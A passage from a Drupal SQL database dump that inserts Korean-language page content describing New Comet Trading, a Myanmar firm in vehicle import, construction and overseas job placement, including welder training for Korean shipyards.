'', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 193, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> \"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧 해외 직업 소개회사</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike) </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-bidi-font-family:&quot;Malgun 